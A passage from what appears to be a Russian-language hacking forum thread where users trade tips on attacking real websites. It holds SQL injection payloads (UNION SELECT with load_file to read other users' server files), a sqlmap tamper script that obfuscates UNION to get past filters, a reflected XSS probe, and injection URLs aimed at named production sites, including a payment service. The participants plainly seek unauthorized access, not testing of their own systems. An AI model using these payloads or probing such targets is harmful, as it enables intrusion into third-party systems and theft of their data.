Это твои ip, а сервер addr - адрес сервера. может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр. Нужно сканировать, чтобы найти ее. сканером директории. линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.) ------------------------ Теперь у меня самого вопрос. Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...
union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.
у меня есть шелл. есть доступ к записям файлов, есть доступ к БД phpmyadmin пользователя. дело даже не в sql ini.. Использовал статью https://xakep.ru/2013/11/16/read-file-in-mysql/ но как-то грустно. То есть не сработало.
Как в sqlmap заменить union на /*!12345uNIoN*/ --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Как заюзать?
Я так понимаю скрипт называется unionalltounion PHP: #!/usr/bin/env python"""Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)See the file 'doc/COPYING' for copying permission"""from lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): """ Replaces /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/ with /*!12345uNioN*/ /*!12345seLEcT*/ >>> tamper('-1 /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/') '-1 /*!12345uNioN*/ /*!12345seLEcT*/' """ return payload.replace("UNION ALL SELECT", "/*!12345uNioN*/ /*!12345seLEcT*/") if payload else payload
http://gmsy.ru/games/lineage-ii-freek'+union+select+1,2,3,4,@@version,6,7,8,9+--+ скобки вроди бы фильтруются http://gmsy.ru/games/lineage-ii-fre...+from+information_schema.tables+limit+0,1+--+
На payonline.ru сканер нашёл это : Code: C:/Users/K9D71~1.MUR/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg и что мне с этим делать? и это Code: ppt/slides/_rels/slide8.xml не могу построить ссылку . http://payonline.ru/error/?aspxerrorpath=/'"--></style></scRipt><scRipt>netsparker(0x0004B4)</scRipt> тут вообще интервал сервер еррор . Нашёл crossdomain.xml Code: <cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain-policy> что это ? .
Мозг себе сломал ,а не скрипт. Есть ли уязвимость в двух скриптах или нет? sqlmap говорит, что нет. Всякие акинетиксы и вебкрайсеры говорят, что там чуть ли не слепая инъекция. Приложить лог не могу. Не в txt формате. Но говорит, что какие-то уязвимости есть, хотя тем же sqlmap я найти не могу. Так ли это или нет? Code: http://www.mydreams.ru/banners.php?bid=2&op=click http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1 http://www.mydreams.ru/usersearch.php?new=1&fm=1&op=99999999 http://www.mydreams.ru/usersearch.php?fromAge=3776996&name_mask=3234652&op=search&whom=0&country=57&search_method=1&toAge=99999999 http://www.mydreams.ru/pollresults.php?poll_id=18&filter= Выяснил, что это XOOPS но все равно непонятно, почему по одной и той же ссылке http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1 Havij определяет это либо как уязвимость, а sqlmap не видит в упор
Всего лишь нет какого-то там плагина, аплета. Это cms Code: Community Forum Software by IP.Board 3.4.6 Уязвимости можно посмотретть на http://exploit-db.com